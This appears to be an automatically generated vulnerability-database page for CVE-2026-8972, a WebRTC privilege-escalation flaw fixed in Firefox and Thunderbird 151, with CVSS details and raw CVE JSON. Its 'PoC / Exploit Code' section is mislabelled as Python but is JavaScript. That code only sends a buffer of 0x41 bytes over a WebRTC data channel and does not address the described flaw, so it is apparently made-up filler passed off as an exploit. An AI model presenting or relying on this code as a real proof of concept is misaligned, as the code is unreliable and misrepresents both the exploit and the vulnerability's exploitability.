Security Vulnerability Report
中文
CVE-2026-8972 CVSS 6.5 MEDIUM

CVE-2026-8972

Published: 2026-05-19 14:16:54
Last Modified: 2026-05-19 18:16:37

Description

Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Firefox < 151
Thunderbird < 151

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// Proof of Concept for CVE-2026-8972 // Exploiting Privilege Escalation in WebRTC Audio/Video function triggerExploit() { console.log("[+] Initializing WebRTC exploit for CVE-2026-8972"); // Create a PeerConnection to interact with the Audio/Video component const pc = new RTCPeerConnection({ iceServers: [{ urls: 'stun:stun.l.google.com:19302' }] }); // Create a data channel to manipulate internal state const dc = pc.createDataChannel("exploit_channel"); dc.onopen = function() { console.log("[+] Data channel open. Attempting privilege escalation..."); // Craft malicious buffer to trigger the overflow/logic flaw // This simulates the specific interaction that bypasses security checks let maliciousPayload = new ArrayBuffer(0x1000); let view = new Uint8Array(maliciousPayload); // Fill with pattern to potentially corrupt memory pointers for(let i=0; i<view.length; i++) { view[i] = 0x41; } try { dc.send(maliciousPayload); console.log("[+] Payload sent via WebRTC."); } catch (e) { console.log("[-] Failed to send payload: " + e); } }; // Trigger the negotiation process pc.createOffer().then(offer => pc.setLocalDescription(offer)); } triggerExploit();

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-8972", "sourceIdentifier": "[email protected]", "published": "2026-05-19T14:16:53.753", "lastModified": "2026-05-19T18:16:37.097", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Privilege escalation in the WebRTC: Audio/Video component. This vulnerability was fixed in Firefox 151 and Thunderbird 151."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2033275", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-46/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-50/", "source": "[email protected]"}]}}